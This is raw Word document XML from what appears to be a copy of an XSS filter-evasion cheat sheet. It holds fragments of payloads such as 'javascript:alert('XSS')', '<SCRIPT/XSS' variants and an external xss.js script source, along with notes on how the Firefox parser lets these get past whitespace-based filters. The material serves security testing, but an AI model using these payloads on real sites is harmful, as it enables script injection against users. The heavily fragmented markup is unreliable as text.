      <w:r>
        <w:t>between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quote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keyword.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actual</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="2"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>reality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char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1-32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decimal:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:spacing w:before="5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104775</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2345690" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="1285" name="Group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5690" cy="116205"/>
                          <a:chOff x="1614" y="165"/>
                          <a:chExt cx="3694" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="1286" name="Freeform 1288"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="1614" y="164"/>
                            <a:ext cx="3694" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 5287 1614"/>
                              <a:gd name="T1" fmla="*/ T0 w 3694"/>
                              <a:gd name="T2" fmla="+- 0 347 165"/>
                              <a:gd name="T3" fmla="*/ 347 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1635 1614"/>
                              <a:gd name="T5" fmla="*/ T4 w 3694"/>
                              <a:gd name="T6" fmla="+- 0 347 165"/>
                              <a:gd name="T7" fmla="*/ 347 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1632 1614"/>
                              <a:gd name="T9" fmla="*/ T8 w 3694"/>
                              <a:gd name="T10" fmla="+- 0 346 165"/>
                              <a:gd name="T11" fmla="*/ 346 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1614 1614"/>
                              <a:gd name="T13" fmla="*/ T12 w 3694"/>
                              <a:gd name="T14" fmla="+- 0 326 165"/>
                              <a:gd name="T15" fmla="*/ 326 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1614 1614"/>
                              <a:gd name="T17" fmla="*/ T16 w 3694"/>
                              <a:gd name="T18" fmla="+- 0 323 165"/>
                              <a:gd name="T19" fmla="*/ 323 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1614 1614"/>
                              <a:gd name="T21" fmla="*/ T20 w 3694"/>
                              <a:gd name="T22" fmla="+- 0 186 165"/>
                              <a:gd name="T23" fmla="*/ 186 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1635 1614"/>
                              <a:gd name="T25" fmla="*/ T24 w 3694"/>
                              <a:gd name="T26" fmla="+- 0 165 165"/>
                              <a:gd name="T27" fmla="*/ 165 h 183"/>
                              <a:gd name="T28" fmla="+- 0 5287 1614"/>
                              <a:gd name="T29" fmla="*/ T28 w 3694"/>
                              <a:gd name="T30" fmla="+- 0 165 165"/>
                              <a:gd name="T31" fmla="*/ 165 h 183"/>
                              <a:gd name="T32" fmla="+- 0 5308 1614"/>
                              <a:gd name="T33" fmla="*/ T32 w 3694"/>
                              <a:gd name="T34" fmla="+- 0 186 165"/>
                              <a:gd name="T35" fmla="*/ 186 h 183"/>
                              <a:gd name="T36" fmla="+- 0 5308 1614"/>
                              <a:gd name="T37" fmla="*/ T36 w 3694"/>
                              <a:gd name="T38" fmla="+- 0 326 165"/>
                              <a:gd name="T39" fmla="*/ 326 h 183"/>
                              <a:gd name="T40" fmla="+- 0 5290 1614"/>
                              <a:gd name="T41" fmla="*/ T40 w 3694"/>
                              <a:gd name="T42" fmla="+- 0 346 165"/>
                              <a:gd name="T43" fmla="*/ 346 h 183"/>
                              <a:gd name="T44" fmla="+- 0 5287 1614"/>
                              <a:gd name="T45" fmla="*/ T44 w 3694"/>
                              <a:gd name="T46" fmla="+- 0 347 165"/>
                              <a:gd name="T47" fmla="*/ 34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694" h="183">
                                <a:moveTo>
                                  <a:pt x="367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673" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3694" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3694" y="161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3676" y="181"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="367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Text Box 128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4"/>
                            <a:ext cx="369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&amp;#14;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javascript:alert('XSS');"&gt;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6" o:spid="_x0000_s1149" style="position:absolute;margin-left:80.7pt;margin-top:8.25pt;width:184.7pt;height:9.15pt;z-index:-15708672;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1614,165" coordsize="369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">
                <v:shape id="Freeform 1288" o:spid="_x0000_s1150" style="position:absolute;left:1614;top:164;width:3694;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="369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VfUcUA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbESPQW/CMAyF75P4D5GRdlvT9VBBISA0qWw7jhXOVmOa&#10;isYpTSjdfv0yadJutt57n5/X28l2YqTBt44VPCcpCOLa6ZYbBdVn+bQA4QOyxs4xKfgiD9vN7GGN&#10;hXZ3/qDxEBoRIewLVGBC6AspfW3Iok9cTxy1sxsshrgOjdQD3iPcdjJL01xabDleMNjTi6H6crjZ&#10;SHktq/drXu4v44my6/dxacNSK/U4n3YrEIGm8G/+S7/pWD9b5PD7TRxB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V9RxQAAAN0AAAAPAAAAAAAAAAAAAAAAAJgCAABkcnMv&#10;ZG93bnJldi54bWxQSwUGAAAAAAQABAD1AAAAigMAAAAA&#10;" path="m3673,182l21,182r-3,-1l,161r,-3l,21,21,,3673,r21,21l3694,161r-18,20l3673,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="3673,347;21,347;18,346;0,326;0,323;0,186;21,165;3673,165;3694,186;3694,326;3676,346;3673,347" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 1287" o:spid="_x0000_s1151" type="#_x0000_t202" style="position:absolute;left:1614;top:164;width:369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aUd8MA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbERPTWvCQBC9F/wPyxR6azb1YDV1FRGFglAa48HjNDsm&#10;i9nZmF01/vuuIHibx/uc6by3jbhQ541jBR9JCoK4dNpwpWBXrN/HIHxA1tg4JgU38jCfDV6mmGl3&#10;5Zwu21CJGMI+QwV1CG0mpS9rsugT1xJH7uA6iyHCrpK6w2sMt40cpulIWjQcG2psaVlTedyerYLF&#10;nvOVOf38/eaH3BTFJOXN6KjU22u/+AIRqA9P8cP9reP84fgT7t/EE+T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aUd8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3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</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:color w:val="36454E"/>
                            <w:spacing w:val="3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&amp;#14;</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:color w:val="36454E"/>
                            <w:spacing w:val="3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javascript:alert('XSS');"&gt;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rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>Non-alpha-non-digit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>XSS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3" w:lineRule="auto"/>
        <w:ind w:left="154" w:right="243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50944" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>3856355</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>343535</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="640715" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="1282" name="Group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715" cy="116205"/>
                          <a:chOff x="6073" y="541"/>
                          <a:chExt cx="1009" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="1283" name="Freeform 1285"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="6073" y="540"/>
                            <a:ext cx="1009" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 7061 6073"/>
                              <a:gd name="T1" fmla="*/ T0 w 1009"/>
                              <a:gd name="T2" fmla="+- 0 723 541"/>
                              <a:gd name="T3" fmla="*/ 723 h 183"/>
                              <a:gd name="T4" fmla="+- 0 6095 6073"/>
                              <a:gd name="T5" fmla="*/ T4 w 1009"/>
                              <a:gd name="T6" fmla="+- 0 723 541"/>
                              <a:gd name="T7" fmla="*/ 723 h 183"/>
                              <a:gd name="T8" fmla="+- 0 6091 6073"/>
                              <a:gd name="T9" fmla="*/ T8 w 1009"/>
                              <a:gd name="T10" fmla="+- 0 722 541"/>
                              <a:gd name="T11" fmla="*/ 722 h 183"/>
                              <a:gd name="T12" fmla="+- 0 6073 6073"/>
                              <a:gd name="T13" fmla="*/ T12 w 1009"/>
                              <a:gd name="T14" fmla="+- 0 702 541"/>
                              <a:gd name="T15" fmla="*/ 702 h 183"/>
                              <a:gd name="T16" fmla="+- 0 6073 6073"/>
                              <a:gd name="T17" fmla="*/ T16 w 1009"/>
                              <a:gd name="T18" fmla="+- 0 699 541"/>
                              <a:gd name="T19" fmla="*/ 699 h 183"/>
                              <a:gd name="T20" fmla="+- 0 6073 6073"/>
                              <a:gd name="T21" fmla="*/ T20 w 1009"/>
                              <a:gd name="T22" fmla="+- 0 562 541"/>
                              <a:gd name="T23" fmla="*/ 562 h 183"/>
                              <a:gd name="T24" fmla="+- 0 6095 6073"/>
                              <a:gd name="T25" fmla="*/ T24 w 1009"/>
                              <a:gd name="T26" fmla="+- 0 541 541"/>
                              <a:gd name="T27" fmla="*/ 541 h 183"/>
                              <a:gd name="T28" fmla="+- 0 7061 6073"/>
                              <a:gd name="T29" fmla="*/ T28 w 1009"/>
                              <a:gd name="T30" fmla="+- 0 541 541"/>
                              <a:gd name="T31" fmla="*/ 541 h 183"/>
                              <a:gd name="T32" fmla="+- 0 7082 6073"/>
                              <a:gd name="T33" fmla="*/ T32 w 1009"/>
                              <a:gd name="T34" fmla="+- 0 562 541"/>
                              <a:gd name="T35" fmla="*/ 562 h 183"/>
                              <a:gd name="T36" fmla="+- 0 7082 6073"/>
                              <a:gd name="T37" fmla="*/ T36 w 1009"/>
                              <a:gd name="T38" fmla="+- 0 702 541"/>
                              <a:gd name="T39" fmla="*/ 702 h 183"/>
                              <a:gd name="T40" fmla="+- 0 7064 6073"/>
                              <a:gd name="T41" fmla="*/ T40 w 1009"/>
                              <a:gd name="T42" fmla="+- 0 722 541"/>
                              <a:gd name="T43" fmla="*/ 722 h 183"/>
                              <a:gd name="T44" fmla="+- 0 7061 6073"/>
                              <a:gd name="T45" fmla="*/ T44 w 1009"/>
                              <a:gd name="T46" fmla="+- 0 723 541"/>
                              <a:gd name="T47" fmla="*/ 72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09" h="183">
                                <a:moveTo>
                                  <a:pt x="988" y="182"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="22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lnTo>
                                  <a:pt x="988" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1009" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1009" y="161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="991" y="181"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="98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" name="Text Box 1284"/>
                        <wps:cNvSpPr txBox="1">
                          <a:spLocks noChangeArrowheads="1"/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="6073" y="540"/>
                            <a:ext cx="100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4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\&lt;SCRIPT\\s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3" o:spid="_x0000_s1152" style="position:absolute;left:0;text-align:left;margin-left:303.65pt;margin-top:27.05pt;width:50.45pt;height:9.15pt;z-index:-17665536;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="6073,541" coordsize="100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">
                <v:shape id="Freeform 1285" o:spid="_x0000_s1153" style="position:absolute;left:6073;top:540;width:1009;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="100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FrU8UA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbESPQYvCMBCF7wv+hzCCtzW14iLVKKIIHjy4rR68Dc3Y&#10;FptJaWKt++s3wsLeZnjve/Nmue5NLTpqXWVZwWQcgSDOra64UHDO9p9zEM4ja6wtk4IXOVivBh9L&#10;TLR98jd1qS9ECGGXoILS+yaR0uUlGXRj2xAH7WZbgz6sbSF1i88QbmoZR9GXNFhxuFBiQ9uS8nv6&#10;MKHG7Gd62sdkumsV0XV3OmaX1Ck1GvabBQhPvf83/9EHHbh4PoX3N2EE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0WtTxQAAAN0AAAAPAAAAAAAAAAAAAAAAAJgCAABkcnMv&#10;ZG93bnJldi54bWxQSwUGAAAAAAQABAD1AAAAigMAAAAA&#10;" path="m988,182r-966,l18,181,,161r,-3l,21,22,,988,r21,21l1009,161r-18,20l988,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="988,723;22,723;18,722;0,702;0,699;0,562;22,541;988,541;1009,562;1009,702;991,722;988,723" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 1284" o:spid="_x0000_s1154" type="#_x0000_t202" style="position:absolute;left:6073;top:540;width:100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QKAMQA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbERPTWvCQBC9F/oflhF6azZKEY1uRIqFQqE0pocex+yY&#10;LMnOxuxW03/fFQRv83ifs96MthNnGrxxrGCapCCIK6cN1wq+y7fnBQgfkDV2jknBH3nY5I8Pa8y0&#10;u3BB532oRQxhn6GCJoQ+k9JXDVn0ieuJI3d0g8UQ4VBLPeAlhttOztJ0Li0ajg0N9vTaUNXuf62C&#10;7Q8XO3P6PHwVx8KU5TLlj3mr1NNk3K5ABBrDXXxzv+s4f7Z4ges38QSZ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0CgD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4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\&lt;SCRIPT\\s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51456" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>4519930</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>343535</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="985520" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="1279" name="Group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5520" cy="116205"/>
                          <a:chOff x="7118" y="541"/>
                          <a:chExt cx="1552" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="1280" name="Freeform 1282"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="7288" y="540"/>
                            <a:ext cx="1337" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 8604 7288"/>
                              <a:gd name="T1" fmla="*/ T0 w 1337"/>
                              <a:gd name="T2" fmla="+- 0 723 541"/>
                              <a:gd name="T3" fmla="*/ 723 h 183"/>
                              <a:gd name="T4" fmla="+- 0 7310 7288"/>
                              <a:gd name="T5" fmla="*/ T4 w 1337"/>
                              <a:gd name="T6" fmla="+- 0 723 541"/>
                              <a:gd name="T7" fmla="*/ 723 h 183"/>
                              <a:gd name="T8" fmla="+- 0 7306 7288"/>
                              <a:gd name="T9" fmla="*/ T8 w 1337"/>
                              <a:gd name="T10" fmla="+- 0 722 541"/>
                              <a:gd name="T11" fmla="*/ 722 h 183"/>
                              <a:gd name="T12" fmla="+- 0 7288 7288"/>
                              <a:gd name="T13" fmla="*/ T12 w 1337"/>
                              <a:gd name="T14" fmla="+- 0 702 541"/>
                              <a:gd name="T15" fmla="*/ 702 h 183"/>
                              <a:gd name="T16" fmla="+- 0 7288 7288"/>
                              <a:gd name="T17" fmla="*/ T16 w 1337"/>
                              <a:gd name="T18" fmla="+- 0 699 541"/>
                              <a:gd name="T19" fmla="*/ 699 h 183"/>
                              <a:gd name="T20" fmla="+- 0 7288 7288"/>
                              <a:gd name="T21" fmla="*/ T20 w 1337"/>
                              <a:gd name="T22" fmla="+- 0 562 541"/>
                              <a:gd name="T23" fmla="*/ 562 h 183"/>
                              <a:gd name="T24" fmla="+- 0 7310 7288"/>
                              <a:gd name="T25" fmla="*/ T24 w 1337"/>
                              <a:gd name="T26" fmla="+- 0 541 541"/>
                              <a:gd name="T27" fmla="*/ 541 h 183"/>
                              <a:gd name="T28" fmla="+- 0 8604 7288"/>
                              <a:gd name="T29" fmla="*/ T28 w 1337"/>
                              <a:gd name="T30" fmla="+- 0 541 541"/>
                              <a:gd name="T31" fmla="*/ 541 h 183"/>
                              <a:gd name="T32" fmla="+- 0 8625 7288"/>
                              <a:gd name="T33" fmla="*/ T32 w 1337"/>
                              <a:gd name="T34" fmla="+- 0 562 541"/>
                              <a:gd name="T35" fmla="*/ 562 h 183"/>
                              <a:gd name="T36" fmla="+- 0 8625 7288"/>
                              <a:gd name="T37" fmla="*/ T36 w 1337"/>
                              <a:gd name="T38" fmla="+- 0 702 541"/>
                              <a:gd name="T39" fmla="*/ 702 h 183"/>
                              <a:gd name="T40" fmla="+- 0 8607 7288"/>
                              <a:gd name="T41" fmla="*/ T40 w 1337"/>
                              <a:gd name="T42" fmla="+- 0 722 541"/>
                              <a:gd name="T43" fmla="*/ 722 h 183"/>
                              <a:gd name="T44" fmla="+- 0 8604 7288"/>
                              <a:gd name="T45" fmla="*/ T44 w 1337"/>
                              <a:gd name="T46" fmla="+- 0 723 541"/>
                              <a:gd name="T47" fmla="*/ 72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7" h="183">
                                <a:moveTo>
                                  <a:pt x="1316" y="182"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="22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lnTo>
                                  <a:pt x="1316" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1337" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1337" y="161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1319" y="181"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="131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Text Box 1281"/>
                        <wps:cNvSpPr txBox="1">
                          <a:spLocks noChangeArrowheads="1"/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="7117" y="540"/>
                            <a:ext cx="15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line="182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0"/>
                                  <w:sz w:val="16"/>
                                </w:rPr>
                                <w:t>!=</w:t>
                              </w:r>
                              <w:r>
                                <w:rPr>
                                  <w:spacing w:val="6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\&lt;SCRIPT/XSS\\s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34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0" o:spid="_x0000_s1155" style="position:absolute;left:0;text-align:left;margin-left:355.9pt;margin-top:27.05pt;width:77.6pt;height:9.15pt;z-index:-17665024;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="7118,541" coordsize="155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">
                <v:shape id="Freeform 1282" o:spid="_x0000_s1156" style="position:absolute;left:7288;top:540;width:1337;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="133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f4QMkA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbESPQWvCQBCF74X+h2UKvRTd6KGG6CrWtlDooTQVwduQ&#10;nSZbs7Mhu9XYX985CN5meG/e+2axGnyrjtRHF9jAZJyBIq6CdVwb2H69jnJQMSFbbAOTgTNFWC1v&#10;bxZY2HDiTzqWqVYSwrFAA01KXaF1rBryGMehIxbtO/Qek6x9rW2PJwn3rZ5m2aP26FgaGuxo01B1&#10;KH+9gZf9bjtxP+/DrN6UHy4/P/w9PZMx93fDeg4q0ZCu5sv1mxX8aS788o2MoJf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xf4QMkAAADdAAAADwAAAAAAAAAAAAAAAACYAgAA&#10;ZHJzL2Rvd25yZXYueG1sUEsFBgAAAAAEAAQA9QAAAI4DAAAAAA==&#10;" path="m1316,182l22,182r-4,-1l,161r,-3l,21,22,,1316,r21,21l1337,161r-18,20l1316,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="1316,723;22,723;18,722;0,702;0,699;0,562;22,541;1316,541;1337,562;1337,702;1319,722;1316,723" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 1281" o:spid="_x0000_s1157" type="#_x0000_t202" style="position:absolute;left:7117;top:540;width:155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OpmMIA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbERPTYvCMBC9C/sfwgjeNNWDaDWKyC4sCGKtB49jM7bB&#10;ZtJtslr/vVlY8DaP9znLdWdrcafWG8cKxqMEBHHhtOFSwSn/Gs5A+ICssXZMCp7kYb366C0x1e7B&#10;Gd2PoRQxhH2KCqoQmlRKX1Rk0Y9cQxy5q2sthgjbUuoWHzHc1nKSJFNp0XBsqLChbUXF7fhrFWzO&#10;nH2an/3lkF0zk+fzhHfTm1KDfrdZgAjUhbf43/2t4/zJbAx/38QT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w6mYwgAAAN0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line="182" w:lineRule="exac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!=</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:spacing w:val="6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\&lt;SCRIPT/XSS\\s</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:color w:val="36454E"/>
                            <w:spacing w:val="-34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The</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="4"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Firefox</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>parser</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="4"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>assumes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non-alpha-non-digit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valid</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="4"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>after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HTML</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="4"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>keyword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therefore</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="4"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>considers</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>it</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3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whitespace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non-valid</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>token</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>after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HTML</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>tag.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problem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XSS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>filters</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>assume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looking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broken</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="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whitespace.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105410</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2777490" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="1276" name="Group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7490" cy="116205"/>
                          <a:chOff x="1614" y="166"/>
                          <a:chExt cx="4374" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="1277" name="Freeform 1279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4374" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 5967 1614"/>
                              <a:gd name="T1" fmla="*/ T0 w 4374"/>
                              <a:gd name="T2" fmla="+- 0 348 166"/>
                              <a:gd name="T3" fmla="*/ 348 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1635 1614"/>
                              <a:gd name="T5" fmla="*/ T4 w 4374"/>
                              <a:gd name="T6" fmla="+- 0 348 166"/>
                              <a:gd name="T7" fmla="*/ 348 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1632 1614"/>
                              <a:gd name="T9" fmla="*/ T8 w 4374"/>
                              <a:gd name="T10" fmla="+- 0 348 166"/>
                              <a:gd name="T11" fmla="*/ 348 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1614 1614"/>
                              <a:gd name="T13" fmla="*/ T12 w 4374"/>
                              <a:gd name="T14" fmla="+- 0 327 166"/>
                              <a:gd name="T15" fmla="*/ 327 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1614 1614"/>
                              <a:gd name="T17" fmla="*/ T16 w 4374"/>
                              <a:gd name="T18" fmla="+- 0 324 166"/>
                              <a:gd name="T19" fmla="*/ 324 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1614 1614"/>
                              <a:gd name="T21" fmla="*/ T20 w 4374"/>
                              <a:gd name="T22" fmla="+- 0 187 166"/>
                              <a:gd name="T23" fmla="*/ 187 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1635 1614"/>
                              <a:gd name="T25" fmla="*/ T24 w 4374"/>
                              <a:gd name="T26" fmla="+- 0 166 166"/>
                              <a:gd name="T27" fmla="*/ 166 h 183"/>
                              <a:gd name="T28" fmla="+- 0 5967 1614"/>
                              <a:gd name="T29" fmla="*/ T28 w 4374"/>
                              <a:gd name="T30" fmla="+- 0 166 166"/>
                              <a:gd name="T31" fmla="*/ 166 h 183"/>
                              <a:gd name="T32" fmla="+- 0 5988 1614"/>
                              <a:gd name="T33" fmla="*/ T32 w 4374"/>
                              <a:gd name="T34" fmla="+- 0 187 166"/>
                              <a:gd name="T35" fmla="*/ 187 h 183"/>
                              <a:gd name="T36" fmla="+- 0 5988 1614"/>
                              <a:gd name="T37" fmla="*/ T36 w 4374"/>
                              <a:gd name="T38" fmla="+- 0 327 166"/>
                              <a:gd name="T39" fmla="*/ 327 h 183"/>
                              <a:gd name="T40" fmla="+- 0 5970 1614"/>
                              <a:gd name="T41" fmla="*/ T40 w 4374"/>
                              <a:gd name="T42" fmla="+- 0 348 166"/>
                              <a:gd name="T43" fmla="*/ 348 h 183"/>
                              <a:gd name="T44" fmla="+- 0 5967 1614"/>
                              <a:gd name="T45" fmla="*/ T44 w 4374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374" h="183">
                                <a:moveTo>
                                  <a:pt x="435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353" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4374" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4374" y="161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4356" y="182"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="435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" name="Text Box 1278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437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&lt;SCRIPT/XSS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</w:t>
                              </w:r>
                              <w:hyperlink r:id="rId16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http://xss.rocks/xss.js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77" o:spid="_x0000_s1158" style="position:absolute;margin-left:80.7pt;margin-top:8.3pt;width:218.7pt;height:9.15pt;z-index:-15708160;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1614,166" coordsize="437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">
